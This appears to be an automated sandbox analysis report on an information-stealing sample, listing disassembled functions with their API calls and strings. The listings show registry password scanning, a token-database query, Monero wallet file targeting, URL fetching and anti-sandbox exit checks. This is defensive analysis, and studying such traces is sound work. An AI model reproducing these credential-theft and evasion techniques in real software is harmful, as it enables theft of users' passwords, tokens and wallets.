Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: aac060d00fa2b68f4eb18bd79e25fb1bdd80bccbbb055b969708caf924d3ac51
Instruction ID: 811e9948fc2cd86d7a0c000c9c94f1026f1aa84748016e5644f8b2db6a99e39c
Opcode Fuzzy Hash: aac060d00fa2b68f4eb18bd79e25fb1bdd80bccbbb055b969708caf924d3ac51
Instruction Fuzzy Hash: B321F9B2A44318ABDB00DFD4DC49FAFB7B9FB44B54F104609F605AB280D77869058BA5

Function 003C72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 003C733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003C73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003C740D
GetProcessHeap.KERNEL32(00000000,?), ref: 003C7452
HeapFree.KERNEL32(00000000), ref: 003C7459
task.LIBCPMTD ref: 003C7555

Strings

Password, xrefs: 003C7401

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 540401f113f94788f9a5f8f9478fd326f82b043f3869784f37d96004fac75363
Instruction ID: 3fe675beedd650b04d00cc444e53733a64c5426c1ec68441c932ef76655160e2
Opcode Fuzzy Hash: 540401f113f94788f9a5f8f9478fd326f82b043f3869784f37d96004fac75363
Instruction Fuzzy Hash: 12611BB590426C9BDB25DB50CC55FDAB7B8BF44300F0085E9E689AA141DBB06FC9CFA1

Function 003CBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

lstrlen.KERNEL32(00000000), ref: 003CBC9F

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 003CBCCD
lstrlen.KERNEL32(00000000), ref: 003CBDA5
lstrlen.KERNEL32(00000000), ref: 003CBDB9

Strings

AccountTokens, xrefs: 003CBABA
AccountId, xrefs: 003CBCC4
SELECT service, encrypted_token FROM token_service, xrefs: 003CBBEB
AccountTokens, xrefs: 003CBB49

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 2da21b2d1986eadc76c413a321f654f2d08f60426d8d562b229a218815e02e57
Instruction ID: cd74ca185ab6b71ce0868fdd8654ac78ebbfe03eb0c6363bd01bdac816f83015
Opcode Fuzzy Hash: 2da21b2d1986eadc76c413a321f654f2d08f60426d8d562b229a218815e02e57
Instruction Fuzzy Hash: 55B179739106189BCF06FBA0EE96EEE773DAF14300F404119F506AA191EF346E49DB62

Function 003C4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003C4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 003C4FD1
InternetOpenA.WININET(003E0DDF,00000000,00000000,00000000,00000000), ref: 003C4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003C5011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 003C5041
InternetCloseHandle.WININET(?), ref: 003C50B9
InternetCloseHandle.WININET(?), ref: 003C50C6

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: baa6098f5ba95133fdde6b90f9ed7ff748739fa4af1730242a17676a020d7775
Instruction ID: 2d179f7d1bbec716bc714cecf0d13d92f2350de5ef01ac99ca203c3cb2c2aadb
Opcode Fuzzy Hash: baa6098f5ba95133fdde6b90f9ed7ff748739fa4af1730242a17676a020d7775
Instruction Fuzzy Hash: 863107B4A40228EBDB20CF94DC85BDDB7B5EB48704F1085D9EB09A7281D7706EC58F99

Function 003D83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003D8426
wsprintfA.USER32 ref: 003D8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003D847B
RegCloseKey.ADVAPI32(00000000), ref: 003D848C
RegCloseKey.ADVAPI32(00000000), ref: 003D8499

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

RegQueryValueExA.KERNEL32(00000000,00EBDB98,00000000,000F003F,?,00000400), ref: 003D84EC
lstrlen.KERNEL32(?), ref: 003D8501
RegQueryValueExA.KERNEL32(00000000,00EBDBF8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003E0B34), ref: 003D8599
RegCloseKey.KERNEL32(00000000), ref: 003D8608
RegCloseKey.ADVAPI32(00000000), ref: 003D861A

Strings

%s\%s, xrefs: 003D844D

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: e288f721bd0db1b48f80a47e5eb315ce77b60c9508a8af8721f41924f0ee4e1c
Instruction ID: 77bf297c399d69f12654485157c9e58f943ae36a02f9819e6aaeb10f99e00fd3
Opcode Fuzzy Hash: e288f721bd0db1b48f80a47e5eb315ce77b60c9508a8af8721f41924f0ee4e1c
Instruction Fuzzy Hash: ED211972950228ABDB24DF54DC85FE9B3B9FB48700F00C1D9E609A6280DF71AA85CFD4

Function 003D7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D76A4
RtlAllocateHeap.NTDLL(00000000), ref: 003D76AB
RegOpenKeyExA.KERNEL32(80000002,00EAB9D8,00000000,00020119,00000000), ref: 003D76DD
RegQueryValueExA.KERNEL32(00000000,00EBDCE8,00000000,00000000,?,000000FF), ref: 003D76FE
RegCloseKey.ADVAPI32(00000000), ref: 003D7708

Strings

Windows 11, xrefs: 003D76BD

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 008c78e7351798d07a5f722620b0be0167a5f4c20e4cc3a9f88def2a63f2578f
Instruction ID: 94884a6c0682aa8cd40d6214f9b5225324033d3120bfc6742678537be97dd430
Opcode Fuzzy Hash: 008c78e7351798d07a5f722620b0be0167a5f4c20e4cc3a9f88def2a63f2578f
Instruction Fuzzy Hash: 8401A2B9A80304BBDB00DBE0ED49F7FB7BDEB08700F008555FA04D7290E67099008B51

Function 003D7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7734
RtlAllocateHeap.NTDLL(00000000), ref: 003D773B
RegOpenKeyExA.KERNEL32(80000002,00EAB9D8,00000000,00020119,003D76B9), ref: 003D775B
RegQueryValueExA.KERNEL32(003D76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003D777A
RegCloseKey.ADVAPI32(003D76B9), ref: 003D7784

Strings

CurrentBuildNumber, xrefs: 003D7771

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 65521d841f991415e0d27da67970922f8c17c72c1356edda1b95e2c58119ba3e
Instruction ID: c712ab74831979eebb2c696424c4c5c1b2b29e82bd872e5bfa5d854b18a452f3
Opcode Fuzzy Hash: 65521d841f991415e0d27da67970922f8c17c72c1356edda1b95e2c58119ba3e
Instruction Fuzzy Hash: F30117B9A40308BBD700DFE4DC49FAFB7B9EB44741F108555FA05A7281DB7059408B51

Function 003D69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB0618), ref: 003D98A1
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB0558), ref: 003D98BA
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB05A0), ref: 003D98D2
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB0810), ref: 003D98EA
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB0570), ref: 003D9903
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB88B0), ref: 003D991B
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EA67E0), ref: 003D9933
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EA69C0), ref: 003D994C
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB0648), ref: 003D9964
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB07C8), ref: 003D997C
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB0708), ref: 003D9995
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB07E0), ref: 003D99AD
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EA6820), ref: 003D99C5
Part of subcall function 003D9860: GetProcAddress.KERNEL32(75550000,00EB0660), ref: 003D99DE

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003C11D0: ExitProcess.KERNEL32 ref: 003C1211

Part of subcall function 003C1160: GetSystemInfo.KERNEL32(?), ref: 003C116A
Part of subcall function 003C1160: ExitProcess.KERNEL32 ref: 003C117E

Part of subcall function 003C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003C112B
Part of subcall function 003C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003C1132
Part of subcall function 003C1110: ExitProcess.KERNEL32 ref: 003C1143

Part of subcall function 003C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003C123E
Part of subcall function 003C1220: __aulldiv.LIBCMT ref: 003C1258
Part of subcall function 003C1220: __aulldiv.LIBCMT ref: 003C1266
Part of subcall function 003C1220: ExitProcess.KERNEL32 ref: 003C1294

Part of subcall function 003D6770: GetUserDefaultLangID.KERNEL32 ref: 003D6774

Part of subcall function 003C1190: ExitProcess.KERNEL32 ref: 003C11C6

Part of subcall function 003D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003C11B7), ref: 003D7880
Part of subcall function 003D7850: RtlAllocateHeap.NTDLL(00000000), ref: 003D7887
Part of subcall function 003D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003D789F

Part of subcall function 003D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7910
Part of subcall function 003D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003D7917
Part of subcall function 003D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003D792F

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00EB88A0,?,003E110C,?,00000000,?,003E1110,?,00000000,003E0AEF), ref: 003D6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003D6AE8
CloseHandle.KERNEL32(00000000), ref: 003D6AF9
Sleep.KERNEL32(00001770), ref: 003D6B04
